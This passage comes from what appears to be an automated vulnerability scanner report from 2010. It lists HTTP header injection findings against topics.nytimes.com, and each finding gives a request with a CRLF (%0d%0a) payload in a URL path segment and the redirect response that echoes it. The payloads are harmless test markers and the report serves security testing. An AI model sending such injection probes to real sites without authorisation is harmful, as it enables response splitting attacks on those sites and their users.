GET /top/aa7f7%0d%0ac83acbda829/business/companies/facebook_inc/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:01 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/aa7f7 c83acbda829/business/companies/facebook_inc/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.31. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/business/companies/facebook_inc/ |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 2bbb8%0d%0aba85651de7d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/news/2bbb8%0d%0aba85651de7d/companies/facebook_inc/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/2bbb8 ba85651de7d/companies/facebook_inc/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.32. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/business/companies/facebook_inc/ |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload b9baf%0d%0aa1360d28e2e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/news/business/b9baf%0d%0aa1360d28e2e/facebook_inc/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/business/b9baf a1360d28e2e/facebook_inc/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.33. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 5]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/business/companies/facebook_inc/ |
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload c984f%0d%0a8bf08eaef82 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/news/business/companies/c984f%0d%0a8bf08eaef82/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/business/companies/c984f 8bf08eaef82/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.34. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/international/countriesandterritories/afghanistan/ |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 452b3%0d%0a45e72dace08 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/452b3%0d%0a45e72dace08/international/countriesandterritories/afghanistan/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:01 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/452b3 45e72dace08/international/countriesandterritories/afghanistan/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.35. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/international/countriesandterritories/afghanistan/ |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 702ff%0d%0af1bdf025466 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/news/702ff%0d%0af1bdf025466/countriesandterritories/afghanistan/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/702ff f1bdf025466/countriesandterritories/afghanistan/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.36. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/international/countriesandterritories/afghanistan/ |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload dd652%0d%0aabf2c5794ae was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/news/international/dd652%0d%0aabf2c5794ae/afghanistan/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:02 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/international/dd652 abf2c5794ae/afghanistan/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.37. http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 5]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/international/countriesandterritories/afghanistan/ |
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload 27e5f%0d%0a005360684f4 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/news/international/countriesandterritories/27e5f%0d%0a005360684f4/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:03 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/international/countriesandterritories/27e5f 005360684f4/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.38. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/international/countriesandterritories/haiti/ |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload ac067%0d%0a8fd1d3084c5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/ac067%0d%0a8fd1d3084c5/international/countriesandterritories/haiti/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:56:27 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/ac067 8fd1d3084c5/international/countriesandterritories/haiti/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.39. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/international/countriesandterritories/haiti/ |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload b1249%0d%0aa65178becf8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/news/b1249%0d%0aa65178becf8/countriesandterritories/haiti/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:56:27 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/b1249 a65178becf8/countriesandterritories/haiti/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.40. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/international/countriesandterritories/haiti/ |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 32910%0d%0a75a8d968bdf was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/news/international/32910%0d%0a75a8d968bdf/haiti/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:56:28 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/international/32910 75a8d968bdf/haiti/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.41. http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 5]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/international/countriesandterritories/haiti/ |
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload 4754f%0d%0a05a44130f21 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /top/news/international/countriesandterritories/4754f%0d%0a05a44130f21/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:56:29 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/international/countriesandterritories/4754f 05a44130f21/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.42. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/science/topics/globalwarming/ |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload b9b2a%0d%0a6be4bca8bd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/b9b2a%0d%0a6be4bca8bd/science/topics/globalwarming/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:58:52 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/b9b2a 6be4bca8bd/science/topics/globalwarming/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.43. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 3]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/science/topics/globalwarming/ |
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload e5cd4%0d%0adb7fbdd22fb was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /top/news/e5cd4%0d%0adb7fbdd22fb/topics/globalwarming/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:58:52 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/e5cd4 db7fbdd22fb/topics/globalwarming/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.44. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 4]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/science/topics/globalwarming/ |
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload 93137%0d%0a300951b64e8 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /top/news/science/93137%0d%0a300951b64e8/globalwarming/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
|
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:58:53 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/news/science/93137 300951b64e8/globalwarming/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML> |
2.45. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 5]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://topics.nytimes.com |
Path: |
/top/news/science/topics/globalwarming/ |
Issue detail
The value of REST URL parameter 5 is copied into the Location response header. The payload ffc0c%0d%0a5ed16640b46 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
